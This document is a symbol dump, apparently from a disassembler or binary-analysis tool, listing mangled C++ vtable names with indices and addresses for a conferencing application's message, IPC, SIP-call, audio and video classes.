              ??_7?$CmmMessageTemplate_5@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@@Archive@Cmm@@6B@18060x4e9afc
              ??_7?$CmmMessageTemplate_5@IV?$CStringT@_W@Cmm@@IV12@V12@@Archive@Cmm@@6B@18070x4ea414
              ??_7?$CmmMessageTemplate_5@IV?$CStringT@_W@Cmm@@V12@V12@I@Archive@Cmm@@6B@18080x4ea744
              ??_7?$CmmMessageTemplate_5@IV?$CStringT@_W@Cmm@@V12@V12@V12@@Archive@Cmm@@6B@18090x4e53f0
              ??_7?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@HHV12@V12@@Archive@Cmm@@6B@18100x4e81fc
              ??_7?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@HV12@V12@V12@@Archive@Cmm@@6B@18110x4ea234
              ??_7?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@HV12@V12@_J@Archive@Cmm@@6B@18120x4e6f64
              ??_7?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@IHV12@I@Archive@Cmm@@6B@18130x4e7fbc
              ??_7?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@IIIH@Archive@Cmm@@6B@18140x4e8a6c
              ??_7?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@V12@IV12@_J@Archive@Cmm@@6B@18150x4e8154
              ??_7?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@V12@V12@HH@Archive@Cmm@@6B@18160x4e8dfc
              ??_7?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@V12@V12@V12@V12@@Archive@Cmm@@6B@18170x4e92d0
              ??_7?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@V32@V32@V32@@Archive@Cmm@@6B@18180x4e7aec
              ??_7?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@_JV12@HV12@@Archive@Cmm@@6B@18190x4e773c
              ??_7?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@HHHH@Archive@Cmm@@6B@18200x4e618c
              ??_7?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@HIIV12@@Archive@Cmm@@6B@18210x4e7ca4
              ??_7?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@IHIH@Archive@Cmm@@6B@18220x4ea63c
              ??_7?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@IV12@V12@I@Archive@Cmm@@6B@18230x4e9594
              ??_7?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@IV12@V12@V12@@Archive@Cmm@@6B@18240x4e8124
              ??_7?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@HHH@Archive@Cmm@@6B@18250x4e5228
              ??_7?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@HV12@V12@@Archive@Cmm@@6B@18260x4e7df4
              ??_7?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@HV12@@Archive@Cmm@@6B@18270x4e5480
              ??_7?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@IH@Archive@Cmm@@6B@18280x4e7b9c
              ??_7?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@II@Archive@Cmm@@6B@18290x4e8c1c
              ??_7?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@V12@H@Archive@Cmm@@6B@18300x4e846c
              ??_7?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@@Archive@Cmm@@6B@18310x4e7e9c
              ??_7?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@V?$CStringT@D@2@H@Archive@Cmm@@6B@18320x4e9eec
              ??_7?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@_J_JV12@V12@@Archive@Cmm@@6B@18330x4e5150
              ??_7?$CmmMessageTemplate_5@_JV?$CStringT@D@Cmm@@IV12@V12@@Archive@Cmm@@6B@18340x4e8574
              ??_7?$CmmMessageTemplate_5@_JV?$CStringT@D@Cmm@@V12@_JV12@@Archive@Cmm@@6B@18350x4e7d94
              ??_7?$CmmMessageTemplate_5@_JV?$CStringT@_W@Cmm@@V12@V12@I@Archive@Cmm@@6B@18360x4e8bbc
              ??_7?$CmmMessageTemplate_5@_JV?$CStringT@_W@Cmm@@V12@V12@V12@@Archive@Cmm@@6B@18370x4ea4a4
              ??_7?$CmmMessageTemplate_6@HHHHV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@6B@18380x4e7324
              ??_7?$CmmMessageTemplate_6@HHHV?$CStringT@_W@Cmm@@V12@H@Archive@Cmm@@6B@18390x4e7e24
              ??_7?$CmmMessageTemplate_6@HHHV?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@6B@18400x4e60dc
              ??_7?$CmmMessageTemplate_6@HV?$CStringT@D@Cmm@@IIII@Archive@Cmm@@6B@18410x4e9ea4
              ??_7?$CmmMessageTemplate_6@HV?$CStringT@D@Cmm@@V12@V12@HV12@@Archive@Cmm@@6B@18420x4e9ab4
              ??_7?$CmmMessageTemplate_6@HV?$CStringT@_W@Cmm@@V12@V12@HH@Archive@Cmm@@6B@18430x4e87cc
              ??_7?$CmmMessageTemplate_6@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@@Archive@Cmm@@6B@18440x4e7aa8
              ??_7?$CmmMessageTemplate_6@IV?$CStringT@_W@Cmm@@IV12@V12@H@Archive@Cmm@@6B@18450x4e91bc
              ??_7?$CmmMessageTemplate_6@IV?$CStringT@_W@Cmm@@V12@V12@II@Archive@Cmm@@6B@18460x4ea6b4
              ??_7?$CmmMessageTemplate_6@IV?$CStringT@_W@Cmm@@V12@V12@V12@V12@@Archive@Cmm@@6B@18470x4e9de4
              ??_7?$CmmMessageTemplate_6@IV?$CStringT@_W@Cmm@@V12@V12@V12@_J@Archive@Cmm@@6B@18480x4e63c8
              ??_7?$CmmMessageTemplate_6@V?$CStringT@D@Cmm@@HV12@V12@V12@H@Archive@Cmm@@6B@18490x4e50f0
              ??_7?$CmmMessageTemplate_6@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@@Archive@Cmm@@6B@18500x4e8d0c
              ??_7?$CmmMessageTemplate_6@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@V32@V32@V32@V32@@Archive@Cmm@@6B@18510x4e9a84
              ??_7?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@HHHHH@Archive@Cmm@@6B@18520x4ea624
              ??_7?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@HIIV12@V12@@Archive@Cmm@@6B@18530x4ea504
              ??_7?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@IHIHV12@@Archive@Cmm@@6B@18540x4e9270
              ??_7?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@IV12@V12@II@Archive@Cmm@@6B@18550x4e7b34
              ??_7?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J@Archive@Cmm@@6B@18560x4e5f78
              ??_7?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@V12@HHHH@Archive@Cmm@@6B@18570x4e5510
              ??_7?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@V12@V12@V12@HH@Archive@Cmm@@6B@18580x4e807c
              ??_7?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@H@Archive@Cmm@@6B@18590x4e54f8
              ??_7?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@@Archive@Cmm@@6B@18600x4ea4d4
              ??_7?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@_J_JV12@V12@V12@@Archive@Cmm@@6B@18610x4e8c64
              ??_7?$CmmMessageTemplate_6@_JV?$CStringT@D@Cmm@@IV12@V12@H@Archive@Cmm@@6B@18620x4e8a0c
              ??_7?$CmmMessageTemplate_6@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@@Archive@Cmm@@6B@18630x4e852c
              ??_7?$CmmMessageTemplate_6@_JV?$CStringT@_W@Cmm@@V12@V12@V12@V12@@Archive@Cmm@@6B@18640x4e8de4
              ??_7?$CmmMessageTemplate_7@HHHHV?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@6B@18650x4e8b5c
              ??_7?$CmmMessageTemplate_7@HHHV?$CStringT@_W@Cmm@@V12@HV12@@Archive@Cmm@@6B@18660x4e9834
              ??_7?$CmmMessageTemplate_7@HHHV?$CStringT@_W@Cmm@@V12@V12@V12@@Archive@Cmm@@6B@18670x4ea1d4
              ??_7?$CmmMessageTemplate_7@HV?$CStringT@D@Cmm@@V12@V12@HV12@H@Archive@Cmm@@6B@18680x4e52d0
              ??_7?$CmmMessageTemplate_7@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@@Archive@Cmm@@6B@18690x4e89dc
              ??_7?$CmmMessageTemplate_7@IV?$CStringT@_W@Cmm@@V12@V12@III@Archive@Cmm@@6B@18700x4e96cc
              ??_7?$CmmMessageTemplate_7@IV?$CStringT@_W@Cmm@@V12@V12@V12@V12@I@Archive@Cmm@@6B@18710x4e8874
              ??_7?$CmmMessageTemplate_7@IV?$CStringT@_W@Cmm@@V12@V12@V12@_JV12@@Archive@Cmm@@6B@18720x4e7d04
              ??_7?$CmmMessageTemplate_7@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@6B@18730x4e68a8
              ??_7?$CmmMessageTemplate_7@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@V32@V32@V32@V32@V32@@Archive@Cmm@@6B@18740x4e8424
              ??_7?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@HHHHHH@Archive@Cmm@@6B@18750x4e9c1c
              ??_7?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@HIIV12@V12@V12@@Archive@Cmm@@6B@18760x4e9b44
              ??_7?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@IHIHV12@H@Archive@Cmm@@6B@18770x4e8844
              ??_7?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@IV12@V12@II_J@Archive@Cmm@@6B@18780x4e9a3c
              ??_7?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_J@Archive@Cmm@@6B@18790x4e5618
              ??_7?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@V12@HHHHV12@@Archive@Cmm@@6B@18800x4e54b0
              ??_7?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HH@Archive@Cmm@@6B@18810x4e5e7c
              ??_7?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@6B@18820x4ea114
              ??_7?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@_J_JV12@V12@V12@H@Archive@Cmm@@6B@18830x4e957c
              ??_7?$CmmMessageTemplate_7@_JV?$CStringT@D@Cmm@@IV12@V12@HH@Archive@Cmm@@6B@18840x4ea24c
              ??_7?$CmmMessageTemplate_7@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@@Archive@Cmm@@6B@18850x4e6f20
              ??_7?$CmmMessageTemplate_7@_JV?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@@Archive@Cmm@@6B@18860x4e8ab4
              ??_7?$CmmMessageTemplate_8@HHHV?$CStringT@_W@Cmm@@V12@HV12@V12@@Archive@Cmm@@6B@18870x4e9c04
              ??_7?$CmmMessageTemplate_8@HHHV?$CStringT@_W@Cmm@@V12@V12@V12@H@Archive@Cmm@@6B@18880x4ea09c
              ??_7?$CmmMessageTemplate_8@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@@Archive@Cmm@@6B@18890x4e8184
              ??_7?$CmmMessageTemplate_8@IV?$CStringT@_W@Cmm@@V12@V12@IIII@Archive@Cmm@@6B@18900x4e8ebc
              ??_7?$CmmMessageTemplate_8@IV?$CStringT@_W@Cmm@@V12@V12@V12@_JV12@V12@@Archive@Cmm@@6B@18910x4e6134
              ??_7?$CmmMessageTemplate_8@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@6B@18920x4e81cc
              ??_7?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@HIIV12@V12@V12@V12@@Archive@Cmm@@6B@18930x4e8544
              ??_7?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@IHIHV12@H_K@Archive@Cmm@@6B@18940x4e8d9c
              ??_7?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@IV12@V12@II_JI@Archive@Cmm@@6B@18950x4e6374
              ??_7?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JH@Archive@Cmm@@6B@18960x4ea84c
              ??_7?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@V12@HHHHV12@H@Archive@Cmm@@6B@18970x4e861c
              ??_7?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HHV12@@Archive@Cmm@@6B@18980x4e849c
              ??_7?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@6B@18990x4e7d1c
              ??_7?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@_J_JV12@V12@V12@HH@Archive@Cmm@@6B@19000x4e7990
              ??_7?$CmmMessageTemplate_8@_JV?$CStringT@D@Cmm@@IV12@V12@HH_J@Archive@Cmm@@6B@19010x4e61bc
              ??_7?$CmmMessageTemplate_8@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@V12@@Archive@Cmm@@6B@19020x4ea3fc
              ??_7?$CmmMessageTemplate_9@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@@Archive@Cmm@@6B@19030x4e7fd4
              ??_7?$CmmMessageTemplate_9@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@H@Archive@Cmm@@6B@19040x4e8bd4
              ??_7?$CmmMessageTemplate_9@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@6B@19050x4ea69c
              ??_7?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@IHIHV12@H_KH@Archive@Cmm@@6B@19060x4e8ea4
              ??_7?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHH@Archive@Cmm@@6B@19070x4e8afc
              ??_7?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HHV12@V12@@Archive@Cmm@@6B@19080x4e615c
              ??_7?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@6B@19090x4e7f2c
              ??_7?$CmmMessageTemplate_9@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@V12@V12@@Archive@Cmm@@6B@19100x4e9b8c
              ??_7CCmmArchivePackageTree@Archive@Cmm@@6B@19110x4ec73c
              ??_7CCmmArchiveTreeNode@Archive@Cmm@@6B@19120x4ec868
              ??_7CFileName@Cmm@@6B@19130x4e34d0
              ??_7CIPCChannelThread@ssb_ipc@@6B@19140x4e921c
              ??_7CRefThread@Cmm@@6B@19150x4e9468
              ??_7CSBMBMessage_AddClientLog@@6B@19160x4e94d4
              ??_7CSBMBMessage_AddToCameraControlGroup@@6B@19170x4e9b2c
              ??_7CSBMBMessage_AppSupportNewWhiteBoardSetting@@6B@19180x4ea72c
              ??_7CSBMBMessage_Assisant_Keybase@@6B@19190x4e7d34
              ??_7CSBMBMessage_Assistant_Audio_Configure_Request@@6B@19200x4e5270
              ??_7CSBMBMessage_Assistant_Audio_Configure_Response@@6B@19210x4e9ae4
              ??_7CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Request@@6B@19220x4e9c34
              ??_7CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Response@@6B@19230x4e9cc4
              ??_7CSBMBMessage_Assistant_Broadcast_Clear_All_Audio_From_Txchannel_Response@@6B@19240x4e97bc
              ??_7CSBMBMessage_Assistant_Broadcast_Network_Audio_Config_Proxy_Request@@6B@19250x4e88a4
              ??_7CSBMBMessage_Assistant_Broadcast_Network_Audio_Config_Proxy_Response@@6B@19260x4e9ff4
              ??_7CSBMBMessage_Assistant_Broadcast_Network_Audio_Stop_Proxy_Response@@6B@19270x4e5c18
              ??_7CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Request@@6B@19280x4e8964
              ??_7CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Response@@6B@19290x4e8fc4
              ??_7CSBMBMessage_Assistant_Broadcast_Unbind_Channel_Audio_Request@@6B@19300x4e9288
              ??_7CSBMBMessage_Assistant_Broadcast_Unbind_Channel_Audio_Response@@6B@19310x4e5450
              ??_7CSBMBMessage_Assistant_CEC_LoadResponse@@6B@19320x4e72a8
              ??_7CSBMBMessage_Assistant_CEC_PowerOnResponse@@6B@19330x4e7c2c
              ??_7CSBMBMessage_Assistant_CEC_StandByResponse@@6B@19340x4ea8ac
              ??_7CSBMBMessage_Assistant_CEC_UnloadResponse@@6B@19350x4e9504
              ??_7CSBMBMessage_Assistant_ControlSystem_CallDeviceSucceedNotify@@6B@19360x4ea684
              ??_7CSBMBMessage_Assistant_ControlSystem_DevicesPreparedNotify@@6B@19370x4e6230
              ??_7CSBMBMessage_Assistant_ControlSystem_DevicesUpdatedNotify@@6B@19380x4e8604
              ??_7CSBMBMessage_Assistant_ControlSystem_DoOperationRequest@@6B@19390x4e56cc
              ??_7CSBMBMessage_Assistant_ControlSystem_ExecuteRuleRequest@@6B@19400x4ea864
              ??_7CSBMBMessage_Assistant_ControlSystem_ExecuteSceneRequest@@6B@19410x4e915c
              ??_7CSBMBMessage_Assistant_ControlSystem_LoadRequest@@6B@19420x4e52b8
              ??_7CSBMBMessage_Assistant_ControlSystem_ScenesPreparedNotify@@6B@19430x4e5198
              ??_7CSBMBMessage_Assistant_DAL_Service_Conf_Render_Change@@6B@19440x4e99ac
              ??_7CSBMBMessage_Assistant_DAL_Service_Get_Service_Status_Response@@6B@19450x4e95ac
              ??_7CSBMBMessage_Assistant_DAL_Service_Identify_Device_Request@@6B@19460x4e58a4
              ??_7CSBMBMessage_Assistant_DAL_Service_Identify_Device_Response@@6B@19470x4e89c4
              ??_7CSBMBMessage_Assistant_DAL_Service_Load_Service_Request@@6B@19480x4e51f8
              ??_7CSBMBMessage_Assistant_DAL_Service_Load_Service_Response@@6B@19490x4e84e4
              ??_7CSBMBMessage_Assistant_DAL_Service_Network_Device_Added_Notification@@6B@19500x4e8694
              ??_7CSBMBMessage_Assistant_DAL_Service_Network_Device_List_Refresh_Notification@@6B@19510x4ea7ec
              ??_7CSBMBMessage_Assistant_DAL_Service_Network_Device_Removed_Notification@@6B@19520x4e7efc
              ??_7CSBMBMessage_Assistant_DAL_Service_Network_Device_Update_Notification@@6B@19530x4e7a60
              ??_7CSBMBMessage_Assistant_DAL_Service_Service_Components_Change_Notification@@6B@19540x4e8274
              ??_7CSBMBMessage_Assistant_DAL_Service_Service_Ready_Notification@@6B@19550x4e50d8
              ??_7CSBMBMessage_Assistant_DAL_Service_Service_Refresh_Device_List_Request@@6B@19560x4e5360
              ??_7CSBMBMessage_Assistant_DAL_Service_Set_Selected_Device_Request@@6B@19570x4ea8dc
              ??_7CSBMBMessage_Assistant_DAL_Service_Set_Selected_Device_Response@@6B@19580x4e96fc
              ??_7CSBMBMessage_Assistant_DAL_Service_Sip_Audio_Render_Change_Notification@@6B@19590x4e80dc
              ??_7CSBMBMessage_Assistant_DAL_Service_Sip_Render_Change@@6B@19600x4e9e5c
              ??_7CSBMBMessage_Assistant_DAL_Service_Unload_Service_Request@@6B@19610x4e837c
              ??_7CSBMBMessage_Assistant_DAL_Service_Unload_Service_Response@@6B@19620x4e825c
              ??_7CSBMBMessage_Assistant_DAL_Service_Unset_Selected_Device_Request@@6B@19630x4ea654
              ??_7CSBMBMessage_Assistant_DAL_Service_Unset_Selected_Device_Response@@6B@19640x4e6864
              ??_7CSBMBMessage_Assistant_DAL_Service_Use_Dante_Controller@@6B@19650x4e8d54
              ??_7CSBMBMessage_Assistant_Exit_Process@@6B@19660x4e9fac
              ??_7CSBMBMessage_Assistant_LineCallMergedNotification@@6B@19670x4ea3cc
              ??_7CSBMBMessage_Assistant_SIP_AudioDeviceFailNotification@@6B@19680x4e8f4c
              ??_7CSBMBMessage_Assistant_SIP_AutoRecordingEvent@@6B@19690x4ea60c
              ??_7CSBMBMessage_Assistant_SIP_CallOperationFailNotification@@6B@19700x4ea3b4
              ??_7CSBMBMessage_Assistant_SIP_CallUpdateKeyValueNotification@@6B@19710x4e7550
              ??_7CSBMBMessage_Assistant_SIP_CallUpdateKeyValueNotificationWithCallID@@6B@19720x4e966c
              ??_7CSBMBMessage_Assistant_SIP_CheckNomadic911Request@@6B@19730x4e7b4c
              ??_7CSBMBMessage_Assistant_SIP_JoinMeetingRequest@@6B@19740x4e777c
              ??_7CSBMBMessage_Assistant_SIP_LineCallTerminatedNotification@@6B@19750x4e6264
              ??_7CSBMBMessage_Assistant_SIP_MergeCallHostChanged@@6B@19760x4e8724
              ??_7CSBMBMessage_Assistant_SIP_MergeCallResponse@@6B@19770x4e978c
              ??_7CSBMBMessage_Assistant_SIP_MessageCountChanged@@6B@19780x4e54e0
              ??_7CSBMBMessage_Assistant_SIP_MessageUploadMemLog@@6B@19790x4e9cdc
              ??_7CSBMBMessage_Assistant_SIP_OnCallIncomingNotification@@6B@19800x4e7cbc
              ??_7CSBMBMessage_Assistant_SIP_OnCallMediaStatusUpdateNotification@@6B@19810x4e9240
              ??_7CSBMBMessage_Assistant_SIP_OnCallRecordingResultNotification@@6B@19820x4e9450
              ??_7CSBMBMessage_Assistant_SIP_OnCallRecordingStatusUpdateNotification@@6B@19830x4e840c
              ??_7CSBMBMessage_Assistant_SIP_OnCallStatusUpdateNotification@@6B@19840x4e91ec
              ??_7CSBMBMessage_Assistant_SIP_OnCallTransferResultNotification@@6B@19850x4e8394
              ??_7CSBMBMessage_Assistant_SIP_OnRegistrarNotification@@6B@19860x4e8244
              ??_7CSBMBMessage_Assistant_SIP_OnSIPServiceStatusChangedNotification@@6B@19870x4e674c
              ??_7CSBMBMessage_Assistant_SIP_ReceiveRealtimePolicesNotification@@6B@19880x4e85a4
              ??_7CSBMBMessage_Assistant_SIP_RemoteMergerEvent@@6B@19890x4e7a18
              ??_7CSBMBMessage_Assistant_SIP_SuspendToResume@@6B@19900x4e94a4
              ??_7CSBMBMessage_Assistant_SIP_SwitchCallToCarrierResponse@@6B@19910x4e747c
              ??_7CSBMBMessage_Assistant_SIP_UpgradeToMeetingRequest@@6B@19920x4e87fc
              ??_7CSBMBMessage_Assistant_SIP_Virtual_Microphone_Create_Request@@6B@19930x4ea45c
              ??_7CSBMBMessage_Assistant_SIP_Virtual_Microphone_Created_Notification@@6B@19940x4e8034
              ??_7CSBMBMessage_Assistant_SIP_Virtual_Microphone_Destroy_Request@@6B@19950x4e5540
              ??_7CSBMBMessage_Assistant_SIP_Virtual_Microphone_Error_Notification@@6B@19960x4ea4bc
              ??_7CSBMBMessage_Assistant_SIP_Virtual_Speaker_Create_Request@@6B@19970x4e85bc
              ??_7CSBMBMessage_Assistant_SIP_Virtual_Speaker_Destroy_Request@@6B@19980x4e8a9c
              ??_7CSBMBMessage_Assistant_SIP_WMIActive@@6B@19990x4e7f8c
              ??_7CSBMBMessage_Assistant_Virtual_Audio_Register_Capturer_Proxy_Response@@6B@20000x4e55b8
              ??_7CSBMBMessage_Assistant_Virtual_Audio_Start_Capture_Response@@6B@20010x4e9300
              ??_7CSBMBMessage_Assistant_Virtual_Audio_Stop_Capture_Response@@6B@20020x4e8f04
              ??_7CSBMBMessage_Assistant_Voice_Command_Action_Request@@6B@20030x4e7280
              ??_7CSBMBMessage_Assistant_Voice_Command_Data_Request@@6B@20040x4e5168
              ??_7CSBMBMessage_Assistant_Voice_Command_Data_Response@@6B@20050x4e9f04
              ??_7CSBMBMessage_Assistant_Voice_Command_Start_Request@@6B@20060x4e5b88
              ??_7CSBMBMessage_Assistant_Voice_Command_Status_Notification@@6B@20070x4e59a4
              ??_7CSBMBMessage_Assistant_Voice_Command_UI_Update_Request@@6B@20080x4ea48c
              ??_7CSBMBMessage_Audio3rdSDK_AudioCmdNotify@@6B@20090x4ea12c
              ??_7CSBMBMessage_Audio3rdSDK_AudioCmdRequest@@6B@20100x4e9cf4
              ??_7CSBMBMessage_AudioFacilityStatus@@6B@20110x4e9db4
              ??_7CSBMBMessage_AvatarDataRequest@@6B@20120x4e8dcc
              ??_7CSBMBMessage_AvatarDataResponse@@6B@20130x4ea4ec
              ??_7CSBMBMessage_CCIScreenRecordingNotify@@6B@20140x4e62d0
              ??_7CSBMBMessage_CCIScreenRecordingRequest@@6B@20150x4e9994
              ??_7CSBMBMessage_CCIVideoAssignAndNotify@@6B@20160x4e9ebc
              ??_7CSBMBMessage_CCIVideoAudioChangeNotify@@6B@20170x4e5258
              ??_7CSBMBMessage_CCIVideoCancelInviteByPhoneRequest@@6B@20180x4e53a8
              ??_7CSBMBMessage_CCIVideoChangeBtnStatusRequest@@6B@20190x4e8334
              ??_7CSBMBMessage_CCIVideoChangeHostRequest@@6B@20200x4e9cac
              ??_7CSBMBMessage_CCIVideoChangeRecordStatusRequest@@6B@20210x4e828c
              ??_7CSBMBMessage_CCIVideoCreateEmbedWindowNotify@@6B@20220x4e8cf4
              ??_7CSBMBMessage_CCIVideoCreateEmbedWindowRequest@@6B@20230x4e51c8
              ??_7CSBMBMessage_CCIVideoDestroyEmbedWindowNotify@@6B@20240x4e804c
              ??_7CSBMBMessage_CCIVideoDestroyEmbedWindowRequest@@6B@20250x4e91a4
              ??_7CSBMBMessage_CCIVideoEmbedWindowSendMsgRequest@@6B@20260x4ea51c
              ??_7CSBMBMessage_CCIVideoEndDropDownClickBtnNotify@@6B@20270x4e991c
              ??_7CSBMBMessage_CCIVideoEndDropdownButtonClickConfirmRequest@@6B@20280x4e9a0c
              ??_7CSBMBMessage_CCIVideoEndVideoNotify@@6B@20290x4e918c
              ??_7CSBMBMessage_CCIVideoEndVideoRequest@@6B@20300x4e7530
              ??_7CSBMBMessage_CCIVideoEventReportNotify@@6B@20310x4e8c94
              ??_7CSBMBMessage_CCIVideoGetCurrentUserRequest@@6B@20320x4e95dc
              ??_7CSBMBMessage_CCIVideoGetCurrentUserResponse@@6B@20330x4e9b5c
              ??_7CSBMBMessage_CCIVideoGetSupportCountryInfoRequest@@6B@20340x4ea264
              ??_7CSBMBMessage_CCIVideoGetSupportCountryInfoResponse@@6B@20350x4e9438
              ??_7CSBMBMessage_CCIVideoGetUserListRequest@@6B@20360x4e85ec
              ??_7CSBMBMessage_CCIVideoGetUserListResponse@@6B@20370x4e5300
              ??_7CSBMBMessage_CCIVideoHoldStatusChangeNotify@@6B@20380x4e9390
              ??_7CSBMBMessage_CCIVideoHostChangeNotify@@6B@20390x4ea0fc
              ??_7CSBMBMessage_CCIVideoInviteByPhoneRequest@@6B@20400x4e9f34
              ??_7CSBMBMessage_CCIVideoInviteByPhoneStatusNotify@@6B@20410x4e64d4
              ??_7CSBMBMessage_CCIVideoJoinMeetingRequest@@6B@20420x4e9e2c
              ??_7CSBMBMessage_CCIVideoJoinMeetingResponse@@6B@20430x4ea8f4
              ??_7CSBMBMessage_CCIVideoMuteAudioRequest@@6B@20440x4e9d3c
              ??_7CSBMBMessage_CCIVideoOnClosedCaptionChanged@@6B@20450x4e90cc
              ??_7CSBMBMessage_CCIVideoOnEmbedWindowSendMsgRequest@@6B@20460x4e8ba4
              ??_7CSBMBMessage_CCIVideoOnLiveCaptionChange@@6B@20470x4e888c
              ??_7CSBMBMessage_CCIVideoOnLiveTranscriptionMsgError@@6B@20480x4ea084
              ??_7CSBMBMessage_CCIVideoOnLiveTranscriptionMsgReceived@@6B@20490x4e9348
              ??_7CSBMBMessage_CCIVideoOnLiveTranscriptionStatusNotify@@6B@20500x4e903c
              ??_7CSBMBMessage_CCIVideoOnUserJoinNotify@@6B@20510x4e9420
              ??_7CSBMBMessage_CCIVideoOnUserLeaveNotify@@6B@20520x4e9408
              ??_7CSBMBMessage_CCIVideoOnUserUpdatedNotify@@6B@20530x4e89ac
              ??_7CSBMBMessage_CCIVideoOpenURLWithDefaultBrowser@@6B@20540x4e74ec
              ??_7CSBMBMessage_CCIVideoPTQuitNotify@@6B@20550x4ea81c
              ??_7CSBMBMessage_CCIVideoReceiveCommandNotify@@6B@20560x4e5600
              ??_7CSBMBMessage_CCIVideoRecordingStateChangeNotify@@6B@20570x4e83ac
              ??_7CSBMBMessage_CCIVideoRemoveUserRequest@@6B@20580x4e82a4
              ??_7CSBMBMessage_CCIVideoSendCommandRequest@@6B@20590x4e8094
              ??_7CSBMBMessage_CCIVideoSetDomainRequest@@6B@20600x4e9f7c
              ??_7CSBMBMessage_CCIVideoSetEndButtonDropdowRequest@@6B@20610x4e591c
              ??_7CSBMBMessage_CCIVideoSetEndButtonTextRequest@@6B@20620x4e9534
              ??_7CSBMBMessage_CCIVideoSetFullScreenRequest@@6B@20630x4e89f4
              ??_7CSBMBMessage_CCIVideoSetVBRequest@@6B@20640x4e581c
              ??_7CSBMBMessage_CCIVideoSettingsSyncFromPTRequest@@6B@20650x4ea6fc
              ??_7CSBMBMessage_CCIVideoSettingsSyncToPTRequest@@6B@20660x4e5108
              ??_7CSBMBMessage_CCIVideoShowEmbedWindowNotify@@6B@20670x4e6024
